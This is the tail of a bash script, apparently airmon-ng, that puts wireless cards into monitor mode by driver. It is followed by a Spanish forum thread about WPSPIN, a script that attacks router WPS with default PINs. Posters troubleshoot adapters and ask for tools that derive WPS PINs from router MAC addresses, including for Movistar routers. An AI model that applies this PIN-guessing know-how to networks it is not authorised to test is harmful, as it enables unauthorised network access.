        ifconfig $IFACE up 2>/dev/null >/dev/null
        UDEV_ISSUE=$?
    fi
    if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
    then
            echo "$iface does not support 'stop', do it on ath interface"
    fi
    echo
    continue
 fi
done

if [ $MADWIFI -eq 1 ]
then
sleep 1s
fi

for iface in `iwconfig 2>/dev/null | egrep '(IEEE|ESSID|802\.11|WLAN)' | sed 's/^\([a-zA-Z0-9_.]*\) .*/\1/' | grep -v wifi`
do
 getModule  $iface
 getDriver  $iface
 getStack   $iface
 getChipset $DRIVER $iface


 if [ x$MAC80211 = "x1" ]
 then
    getPhy $iface
    getNewMon
    printf "$iface\t\t$CHIPSET\t$DRIVER - [$PHYDEV]"
    if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
    then
        if [ $USE_IW = 1 ]
        then
            IW_ERROR=`iw dev $iface interface add $MONDEV type monitor 2>&1 | grep "nl80211 not found"`
            if [ x$IW_ERROR = "x" ]
            then
                sleep 1s
if [ ! -z $3 ]
                then
                if [ $3 -lt 1000 ]
                then
                iwconfig $MONDEV channel $3 >/dev/null 2>&1
                else
                iwconfig $MONDEV freq "$3"000000 >/dev/null 2>&1
                fi
            fi
                ifconfig $MONDEV up
                printf "\n\t\t\t\t(monitor mode enabled on $MONDEV)"
            else
                if [ -f /sys/class/ieee80211/"$PHYDEV"/add_iface ]
                then
                    echo -n "$MONDEV" > /sys/class/ieee80211/"$PHYDEV"/add_iface
                    sleep 1s
                    if [ $3 -lt 1000 ]
                    then
                        iwconfig $MONDEV mode Monitor channel $3 >/dev/null 2>&1
                    else
                        iwconfig $MONDEV mode Monitor freq "$3"000000 >/dev/null 2>&1
                    fi
                    ifconfig $MONDEV up
                    printf "\n\t\t\t\t(monitor mode enabled on $MONDEV)"
                else
                    printf "\n\nERROR: nl80211 support is disabled in your kernel.\nPlease recompile your kernel with nl80211 support enabled.\n"
                fi
            fi
        else
            if [ -f /sys/class/ieee80211/"$PHYDEV"/add_iface ]
            then
                echo -n "$MONDEV" > /sys/class/ieee80211/"$PHYDEV"/add_iface
                sleep 1s
                if [ $3 -lt 1000 ]
                then
                    iwconfig $MONDEV mode Monitor channel $3 >/dev/null 2>&1
                else
                    iwconfig $MONDEV mode Monitor freq "$3"000000 >/dev/null 2>&1
                fi
                ifconfig $MONDEV up
                printf "\n\t\t\t\t(monitor mode enabled on $MONDEV)"
            else
                printf "\n\nERROR: Neither the sysfs interface links nor the iw command is available.\nPlease download and install iw from\n$IW_SOURCE\n"
            fi
        fi
    fi
    if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
    then
        z="`echo $iface | cut -b -${#MON_PREFIX}`"
        if [ x$z = "x$MON_PREFIX" ]
        then
            if [ $USE_IW = 1 ]
            then
                IW_ERROR=`iw dev "$iface" interface del 2>&1 | grep "nl80211 not found"`
                if [ x$IW_ERROR = "x" ]
                then
                    printf " (removed)"
                else
                    if [ -f /sys/class/ieee80211/"$PHYDEV"/remove_iface ]
                    then
                        echo -n "$iface" > /sys/class/ieee80211/"$PHYDEV"/remove_iface
                        printf " (removed)"
                    else
                        printf "\n\nERROR: nl80211 support is disabled in your kernel.\nPlease recompile your kernel with nl80211 support enabled.\n"
                fi
                fi
            else
                if [ -f /sys/class/ieee80211/"$PHYDEV"/remove_iface ]
                then
                    echo -n "$iface" > /sys/class/ieee80211/"$PHYDEV"/remove_iface
                    printf " (removed)"
                else
                    printf "\n\nERROR: Neither the sysfs interface links nor the iw command is available.\nPlease download and install iw from\n$IW_SOURCE\n"
                fi
    fi
        else
            ifconfig $iface down
            iwconfig $iface mode managed
            printf "\n\t\t\t\t(monitor mode disabled)"
        fi
    fi
    echo
    continue
 fi


 if [ x$DRIVER = "xorinoco" ] || [ x"`iwpriv $iface 2>/dev/null | grep get_rid`" != "x" ] || [ x"`iwpriv $iface 2>/dev/null | grep dump_recs`" != "x" ]
 then
    printf "$iface\t\tHermesI\t\torinoco"
    if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
    then
        cp $KISMET~ $KISMET 2>/dev/null &&
        echo "source=orinoco,$iface,HermesI" >>$KISMET
        if [ $CH -lt 1000 ]
        then
            iwconfig $iface mode Monitor channel $CH >/dev/null 2>&1
        else
            iwconfig $iface mode Monitor freq "$CH"000000 >/dev/null 2>&1
        fi
        iwpriv $iface monitor 1 $CH >/dev/null 2>&1
        ifconfig $iface up
        printf " (monitor mode enabled)"
    fi
    if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
    then
        ifconfig $iface down
        iwpriv $iface monitor 0 >/dev/null 2>&1
        iwconfig $iface mode Managed >/dev/null 2>&1
        printf " (monitor mode disabled)"
    fi
    echo
    continue
 fi

 if [ x$DRIVER = "xrtl819xU" ]
 then
  printf "$iface\t\tRealtek 819x\trtl819xU"
    if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
    then
        startStdIface $iface $CH
    fi
    if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
    then
        stopStdIface $iface
    fi
    echo
    continue
 fi

 if [ x$DRIVER = "xipw2100" ] || [ x"`iwpriv $iface 2>/dev/null | grep set_crc_check`" != "x" ]
 then
    printf "$iface\t\tIntel 2100B\tipw2100"
    if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
    then
        cp $KISMET~ $KISMET 2>/dev/null &&
        echo "source=ipw2100,$iface,Centrino_b" >>$KISMET
        startStdIface $iface $CH
    fi
    if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
    then
        stopStdIface $iface
    fi
    echo
    continue
 fi


 if [ x$DRIVER = "xarusb_lnx" ] || [ x$DRIVER = "Otus" ]
 then
    printf "$iface\t\tAR9001USB\tOtus"
    if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
    then
echo "Monitor mode not yet supported"
    fi
    if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
    then
stopStdIface $iface
    fi
    echo
    continue
 fi 

 if [ x$DRIVER = "xWiLink" ]
 then
    getChipset $iface
    printf "$iface\t\t${CHIPSET}\t\t${DRIVER}"
    if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
    then
        printf "\n\t\t\t\tMonitor mode not yet supported"
    fi 
    if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
    then
        stopStdIface $iface
    fi 
    echo
    continue
 fi

 if [ x$DRIVER = "xipw2200" ] || [ x"`iwpriv $iface 2>/dev/null | grep sw_reset`" != "x" ]
 then
    MODINFO=`modinfo ipw2200  2>/dev/null | awk '/^version/ {print $2}'`
    if { echo "$MODINFO" | grep -E '^1\.0\.(0|1|2|3)$' ; }
    then
    echo "Monitor mode not supported, please upgrade"
    else
printf "$iface\t\tIntel 2200BG\tipw2200"
if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
then
    cp $KISMET~ $KISMET 2>/dev/null &&
    echo "source=ipw2200,$iface,Centrino_g" >>$KISMET
    startStdIface $iface $CH
fi
if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
then
    stopStdIface $iface
fi

    if { echo "$MODINFO" | grep -E '^1\.0\.(5|7|8|11)$' ; }
then
printf " (Warning: bad module version, you should upgrade)"
fi
     fi
     echo
     continue
 fi


 if [ x$DRIVER = "xcx3110x" ] || [ x"`iwpriv $iface 2>/dev/null | grep set_backscan`" != "x" ]
 then
     printf "$iface\t\tNokia 770\t\tcx3110x"
     if [ x$1 = "xstart" ] || [ x$1 = "xstop" ]
     then
      printf " (Enable/disable monitor mode not yet supported)"
     fi
     echo
     continue
 fi


 if [ x$DRIVER = "xipw3945" ] || [ x"`iwpriv $iface 2>/dev/null | grep set_preamble | grep -v set_crc_check`" != "x" ]
  then
        printf "$iface\t\tIntel 3945ABG\tipw3945"
        if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
         then
                cp $KISMET~ $KISMET 2>/dev/null &&
                echo "source=ipw3945,$iface,Centrino_g" >>$KISMET
                startStdIface $iface $CH
        fi
        if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
         then
                stopStdIface $iface
        fi
        echo
        continue
 fi


 if [ x"`iwpriv $iface 2>/dev/null | grep inact_auth`" != "x" ]
 then
     if [ -e "/proc/sys/net/$iface/%parent" ]
     then
        printf "$iface\t\tAtheros\t\tmadwifi-ng VAP (parent: `cat /proc/sys/net/$iface/%parent`)"
if [ x$2 = x$iface ] && [ x$1 = "xstop" ]
then
wlanconfig $iface destroy
printf " (VAP destroyed)"
fi
if [ x$1 = "xstart" ]
then
if [ $iface = "$IFACE" ]
then
printf " (monitor mode enabled)"
fi
if [ x$2 = x$iface ]
then
printf " (VAP cannot be put in monitor mode)"
fi
fi

echo ""
        continue

     fi
     printf "$iface\t\tAtheros\t\tmadwifi"
     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
         cp $KISMET~ $KISMET 2>/dev/null &&
         echo "source=madwifi_g,$iface,Atheros" >>$KISMET
         startStdIface $iface $CH
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         stopStdIface $iface
     fi
     echo
     continue
 fi


 if [ x$DRIVER = "xprism54" ] || [ x"`iwpriv $iface 2>/dev/null | grep getPolicy`" != "x" ]
 then
     printf "$iface\t\tPrismGT\t\tprism54"
     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
         cp $KISMET~ $KISMET 2>/dev/null &&
         echo "source=prism54g,$iface,Prism54" >>$KISMET
         ifconfig $iface up
         if [ $CH -lt 1000 ]
         then
             iwconfig $iface mode Monitor channel $CH
         else
             iwconfig $iface mode Monitor freq "$CH"000000
         fi
         iwpriv $iface set_prismhdr 1 >/dev/null 2>&1
         printf " (monitor mode enabled)"
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         stopStdIface $iface
     fi
     echo
     continue
 fi


 if [ x$DRIVER = "xhostap" ] || [ x"`iwpriv $iface 2>/dev/null | grep antsel_rx`" != "x" ]
 then
     printf "$iface\t\tPrism 2/2.5/3\tHostAP"
     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
         cp $KISMET~ $KISMET 2>/dev/null &&
         echo "source=hostap,$iface,Prism2" >>$KISMET
         if [ $CH -lt 1000 ]
         then
             iwconfig $iface mode Monitor channel $CH
         else
             iwconfig $iface mode Monitor freq "$CH"000000
         fi
         iwpriv $iface monitor_type 1 >/dev/null 2>&1
         ifconfig $iface up
         printf " (monitor mode enabled)"
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         stopStdIface $iface
     fi
     echo
     continue
 fi


 if [ x$DRIVER = "xwlan-ng" ] || [ x"`wlancfg show $iface 2>/dev/null | grep p2CnfWEPFlags`" != "x" ]
 then
     printf "$iface\t\tPrism 2/2.5/3\twlan-ng"
     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
         cp $KISMET~ $KISMET 2>/dev/null &&
         echo "source=wlanng,$iface,Prism2" >>$KISMET
         wlanctl-ng $iface lnxreq_ifstate ifstate=enable >/dev/null
         wlanctl-ng $iface lnxreq_wlansniff enable=true channel=$CH \
                           prismheader=true wlanheader=false \
                           stripfcs=true keepwepflags=true >/dev/null
         echo p2CnfWEPFlags=0,4,7 | wlancfg set $iface
         ifconfig $iface up
         printf " (monitor mode enabled)"
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         ifconfig $iface down
         wlanctl-ng $iface lnxreq_wlansniff enable=false  >/dev/null
         wlanctl-ng $iface lnxreq_ifstate ifstate=disable >/dev/null
         printf " (monitor mode disabled)"
     fi
     echo
     continue
 fi


 if [ x$SYSFS = "x" ] && [ x"`iwpriv $iface 2>/dev/null | grep get_RaAP_Cfg`" != "x" ]
 then
    if [ x"`iwconfig $iface | grep ESSID | awk -F\  '{ print $2}' | grep -i rt61`" != "x" ]
    then
    printf "$iface\t\tRalink 2561 PCI\trt61"
    fi

    if [ x"`iwconfig $iface | grep ESSID | awk -F\  '{ print $2}' | grep -i rt73`" != "x" ]
    then
        printf "$iface\t\tRalink 2573 USB\trt73"
    fi

    if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
    then
         startStdIface $iface $CH
         iwpriv $iface rfmontx 1
         if [ x"`iwpriv $iface 2>/dev/null | grep forceprismheader`" != "x" ]
         then
             iwpriv $iface forceprismheader 1
         fi
         if [ x"`iwpriv $iface 2>/dev/null | grep forceprism`" != "x" ]
         then
             iwpriv $iface forceprism 1
         fi
    fi
    if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
      stopStdIface $iface
    fi
    echo
    continue

 fi


 if [ x$DRIVER = "xrt61" ]
 then
    printf "$iface\t\tRalink 2561 PCI\trt61"

    if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
    then
         startStdIface $iface $CH
         iwpriv $iface rfmontx 1
         if [ x"`iwpriv $iface 2>/dev/null | grep forceprismheader`" != "x" ]
         then
             iwpriv $iface forceprismheader 1
         fi
         if [ x"`iwpriv $iface 2>/dev/null | grep forceprism`" != "x" ]
         then
             iwpriv $iface forceprism 1
         fi
    fi
    if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
      stopStdIface $iface
    fi   
    echo
    continue

 fi


 if [ x$DRIVER = "xrt73" ]
 then
    printf "$iface\t\tRalink 2573 USB\trt73"

    if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
    then
         startStdIface $iface $CH
         iwpriv $iface rfmontx 1
         if [ x"`iwpriv $iface 2>/dev/null | grep forceprismheader`" != "x" ]
         then
             iwpriv $iface forceprismheader 1
         fi
         if [ x"`iwpriv $iface 2>/dev/null | grep forceprism`" != "x" ]
         then
             iwpriv $iface forceprism 1
         fi
    fi
    if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
      stopStdIface $iface
    fi   
    echo
    continue

 fi


 if [ x$DRIVER = "xrt2500" ] || [ x"`iwpriv $iface 2>/dev/null | grep bbp`" != "x" ]
 then
     printf "$iface\t\tRalink 2560 PCI\trt2500"
     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
         cp $KISMET~ $KISMET 2>/dev/null &&
         echo "source=rt2500,$iface,Ralink_g" >>$KISMET
         iwconfig $iface mode ad-hoc 2> /dev/null >/dev/null
         startStdIface $iface $CH
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         stopStdIface $iface
     fi
     echo
     continue
 fi


 if [ x$DRIVER = "xrt2570" ] || [ x"`iwpriv $iface 2>/dev/null | grep wpapsk`" != "x" ] && [ x"`iwpriv $iface 2>/dev/null | grep get_RaAP_Cfg`" = "x" ]
 then
     printf "$iface\t\tRalink 2570 USB\trt2570"
     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
         cp $KISMET~ $KISMET 2>/dev/null &&
         echo "source=rt2500,$iface,Ralink_g" >>$KISMET
         iwconfig $iface mode ad-hoc 2> /dev/null >/dev/null
         startStdIface $iface $CH
         if [ x"`iwpriv $iface 2>/dev/null | grep forceprismheader`" != "x" ]
         then
             iwpriv $iface forceprismheader 1
         fi
         if [ x"`iwpriv $iface 2>/dev/null | grep forceprism`" != "x" ]
         then
             iwpriv $iface forceprism 1
         fi
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         stopStdIface $iface
     fi
     echo
     continue
 fi


 if [ x$DRIVER = "xr8180" ] || [ x"`iwpriv $iface 2>/dev/null | grep debugtx`" != "x" ]
 then
     printf "$iface\t\tRTL8180/RTL8185\tr8180"
     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
         cp $KISMET~ $KISMET 2>/dev/null &&
         echo "source=rt8180,$iface,Realtek" >>$KISMET
         if [ $CH -lt 1000 ]
         then
             iwconfig $iface mode Monitor channel $CH
         else
             iwconfig $iface mode Monitor freq "$CH"000000
         fi
         if [ x"`iwpriv $iface 2>/dev/null | grep prismhdr`" != "x" ]
         then
            iwpriv $iface prismhdr 1 >/dev/null 2>&1
         fi
         ifconfig $iface up
         printf " (monitor mode enabled)"
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         stopStdIface $iface
     fi
     echo
     continue
 fi


 if [ x$DRIVER = "xr8187" ] || [ x"`iwpriv $iface 2>/dev/null | grep badcrc`" != "x" ]
 then
     printf "$iface\t\tRTL8187\t\tr8187"
     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
         cp $KISMET~ $KISMET 2>/dev/null &&
         echo "source=rt8180,$iface,Realtek" >>$KISMET
         if [ $CH -lt 1000 ]
         then
             iwconfig $iface mode Monitor channel $CH
         else
             iwconfig $iface mode Monitor freq "$CH"000000
         fi
         if [ x"`iwpriv $iface 2>/dev/null | grep rawtx`" != "x" ]
         then
             iwpriv $iface rawtx 1 >/dev/null 2>&1
         fi
         ifconfig $iface up
         printf " (monitor mode enabled)"
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         stopStdIface $iface
     fi
     echo
     continue
 fi


 if [ x$DRIVER = "xzd1211rw" ] || [ x"`iwpriv $iface 2>/dev/null | grep get_regdomain`" != "x" ]
 then
     printf "$iface\t\tZyDAS 1211\tzd1211rw"
     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
         cp $KISMET~ $KISMET 2>/dev/null &&
         echo "source=zd1211,$iface,ZyDAS" >>$KISMET
         startStdIface $iface $CH
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         stopStdIface $iface
     fi
     echo
     continue
 fi


 if [ x$DRIVER = "xzd1211" ] || [ x"`iwpriv $iface 2>/dev/null | grep dbg_flag`" != "x" ]
 then
     printf "$iface\t\tZyDAS 1211\tzd1211"
     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
         cp $KISMET~ $KISMET 2>/dev/null &&
         echo "source=zd1211,$iface,ZyDAS" >>$KISMET
         startStdIface $iface $CH
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         stopStdIface $iface
     fi
     echo
     continue
 fi


 if [ x$DRIVER = "xacx" ] || [ x"`iwpriv $iface 2>/dev/null | grep GetAcx1`" != "x" ]
 then
     printf "$iface\t\tTI ACX1xx\tacx"
     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
         cp $KISMET~ $KISMET 2>/dev/null &&
         echo "source=acx100,$iface,TI" >>$KISMET
         iwpriv $iface monitor 2 $CH 2> /dev/null >/dev/null
         startStdIface $iface $CH
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         stopStdIface $iface
     fi
     echo
     continue
 fi


 if [ x$DRIVER = "xbcm43xx" ] || [ x"`iwpriv $iface 2>/dev/null | grep write_sprom`" != "x" ]
 then
     printf "$iface\t\tBroadcom\tbcm43xx"
     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
         cp $KISMET~ $KISMET 2>/dev/null &&
         echo "source=bcm43xx,$iface,broadcom" >>$KISMET
         startStdIface $iface $CH
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         stopStdIface $iface
         ifconfig $iface up
     fi
     echo
     continue
 fi


 if [ x$DRIVER = "xislsm" ] || [ x"`iwpriv $iface 2>/dev/null | grep set_announcedpkt`" != "x" ]
 then
    printf "$iface\t\tPrismGT\t\tislsm"
    if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
    then
         startStdIface $iface $CH
    fi
    if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
      stopStdIface $iface
    fi   
    echo
    continue

 fi


 if [ x$DRIVER = "xat76c503a" ] || [ x"`iwpriv $iface 2>/dev/null | grep set_announcedpkt`" != "x" ]
  then
     printf "$iface\t\tAtmel\t\tat76c503a"
     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
          startStdIface $iface $CH
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
      then
      stopStdIface $iface
     fi     
     echo
     continue

 fi


 if [ x$DRIVER = "xndiswrapper" ] || [ x"`iwpriv $iface 2>/dev/null | grep ndis_reset`" != "x" ]
 then
     printf "$iface\t\tUnknown\t\tndiswrapper"
     if [ x$2 = x$iface ]
     then
         echo " (MONITOR MODE NOT SUPPORTED)"
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         stopStdIface $iface
     fi
     echo
     continue
 fi


 if [ x$DRIVER != "x" ]
 then
     if [ x$CHIPSET = "x" ]
     then
         printf "$iface\t\tUNKNOWN\t\t$DRIVER"
     else
         printf "$iface\t\t$CHIPSET\t\t$DRIVER"
     fi

     if [ x$1 = "xstart" ] && [ x$2 = x$iface ]
     then
         startStdIface $iface $CH
     fi
     if [ x$1 = "xstop" ] && [ x$2 = x$iface ]
     then
         stopStdIface $iface
     fi
     echo
     continue
 fi

printf "$iface\t\tUnknown\t\tUnknown (MONITOR MODE NOT SUPPORTED)\n"

done

echo

if [ $UDEV_ISSUE != 0 ] ; then
echo udev renamed the interface. Read the following for a solution:
echo http://www.aircrack-ng.org/doku.php?id=airmon-ng#interface_athx_number_rising_ath0_ath1_ath2...._ath45
echo
fi
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: arkangelo22 en Octubre 13, 2015, 19:44:21 pm
Buenas  queria preguntaros una duda si sois tan amables, sobre el WPSPiN, lo he ejecutado en Wifislax 4.11.1 este script y al elegir el modo guiado me da un error, que verifique el adaptador, permisos, etc.
mi tarjeta de red es una Realtek RTL8187L

A ke es debido dicho error?



Gracias a todos de antemano
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kyrandio en Octubre 13, 2015, 20:37:33 pm
creo que solo va con los Ralink y Broadcom...saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Octubre 13, 2015, 22:01:21 pm
Citar
creo que solo va con los Ralink y Broadcom...saludos.
Eso es oir campanas y no saber donde tocan..   :o

Hablas de otra vulnerabilidad y de otra herramienta.   

Citar
que verifique el adaptador, permisos, etc.
Pues si te pide verificar el adaptador, permisos..   tendrás que hacerlo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: arkangelo22 en Octubre 14, 2015, 06:39:30 am
ok entonces no funciona ni con realtek, ni con atheros?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Octubre 14, 2015, 17:41:19 pm

No me lo puedo creer    :o

Acabo de responder que NO tiene nada que ver..    nada, a vuestro aire.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: arkangelo22 en Octubre 14, 2015, 20:46:16 pm
ok entendido maripuri disculpa
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Octubre 14, 2015, 22:19:17 pm

Citar
y al elegir el modo guiado me da un error, que verifique el adaptador, permisos, etc.
Debéis entender que si no ponéis un copy / paste de la salida del error no ofrecéis apenas información, yo NO uso linux.. y seguramente quien si lo use al ver una descripción tan limitada (por no decir otra cosa) no perderá su tiempo en responder a algo así.

Es mi opinión..
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: arkangelo22 en Octubre 15, 2015, 19:01:46 pm
Aporto imagen maripuri del error ke me sale en wifislax

http://imgur.com/lWIwf0R
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Octubre 15, 2015, 19:59:01 pm

Buenas..

Aqui tienes:  Aprediendo a usar algunas funciones básicas del foro  (como puede ser insertar una imágen)

No uso linux, ya te comentarán..
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: arkangelo22 en Octubre 15, 2015, 21:08:15 pm
ok maripuri ahi va la imagen

(http://s4.postimg.cc/w20woi3vx/instant_nea1.jpg)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Octubre 16, 2015, 00:26:08 am

Bien, pues ya te dirán algo..     ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Fr3dY en Octubre 20, 2015, 11:20:45 am
Buenas  queria preguntaros una duda si sois tan amables, sobre el WPSPiN, lo he ejecutado en Wifislax 4.11.1 este script y al elegir el modo guiado me da un error, que verifique el adaptador, permisos, etc.
mi tarjeta de red es una Realtek RTL8187L

Bueno, antes de todo... ¿has habilitado el WPS de tu router y aún así te sigue apareciendo el error?
Porque que no haya objetivos con WPS activado no sería un error...



Saludos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: arkangelo22 en Octubre 20, 2015, 12:43:55 pm
si esta habilitado
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Fr3dY en Octubre 20, 2015, 13:46:32 pm
Pues no se... que yo recuerde, wash mostraba power 00 con kernels modernos y creo que versiones posteriores de libpcap 1.4.0-2 también tenían algunos problemas con reaver/wash, puede que sea alguna incompatibilidad de versiones  :-\




Saludos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Gmmetinero en Diciembre 08, 2015, 17:05:03 pm
Buenas a todos, he estado probando vulnerabilidades de mi router con la mayoria de las herramientas que traer wifixlax y me detectaban los drivers de la antena de mi portatil broadcom sin en cambio queria probar esta herramienta pero no me detectan los drivers de la antena del portatil.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 09, 2015, 10:31:12 am

El desarrollo y soporte de la versión para linux de WPSPIN está abandonado por el autor así que deberéis buscaros la vida vosotros mismos..
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Vermilion en Diciembre 10, 2015, 22:30:39 pm
Los vínculos para descarga parecen muertos.
¿Es posible habilitarlos? ¿O es porque el programa está descontinuado?

¡Gracias!
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 11, 2015, 17:17:36 pm
Citar
¿Es posible habilitarlos? ¿O es porque el programa está descontinuado?
El desarrollador descontinuó el script, en cualquier caso caulquiera puede modifcarlo a su gusto.

Añadidos dos mirror al comienzo de este hilo y en el área de descargas
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: longyny en Enero 04, 2016, 20:04:15 pm
Buenas,

Alguien me podría decir en donde se guardan los archivos de wpspin generator ?? Tengo una captura en marcha y la quiero poder parar, apagar el equipo y reanudarla otro día desde donde se quedó.

Un saludo y gracias de antemano
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 04, 2016, 22:29:39 pm
Cita de: longyny
Alguien me podría decir en donde se guardan los archivos de wpspin generator ?
Este hilo es para WPSPIN, wpspin generator es una aplicación distinta a esta..  si quieres hablar de ella busca un hilo que trate de ese tema o si no existe lo creas.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: managuas en Mayo 03, 2016, 22:07:19 pm
no se si este es el tema adecuado pregunto no hay ningun scrip o aplicacion en la cual el usuario pueda escribir una mac y esta genere el computer pin de Zaho.hace un año o dos tuve una aplicacion de movil que hacia eso pero cambie de movil y en este momento ni me acuerdo del nombre ni encuentro algo asi,la queria para pruebas ,ejemplo tipo usar la mac terminada en essid .por si suena la flauta por casualidad alguien a probado algo asi.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Mayo 03, 2016, 22:13:19 pm
WPSPIN lo hace..   tamibién puedes compilar tu mismo Compute PIN, el fuente lo tienes aquí:

ComputePIN-C83A35 by ZhaoChunsheng (WPS)

PINwsp GUI es compatible con linxu bajo wine y también te genera el PIN de Compute PIN
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: managuas en Mayo 03, 2016, 22:24:32 pm
no soy programador para modificar nada,queria algo tipo como la aplicacion esa que tube y no recuerdo su nombre,que poniendo yo una mac aunque sea inventada me genere el pin.

ok ya lo pille marypuri
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: guardianocturno36 en Septiembre 07, 2017, 23:23:30 pm
saludos amigo:
sabes si sirve para los nuevos router de movistar los de fibra con mac: 34:57:60XXX
un saludo y muchas gracias por compartir tu trabajo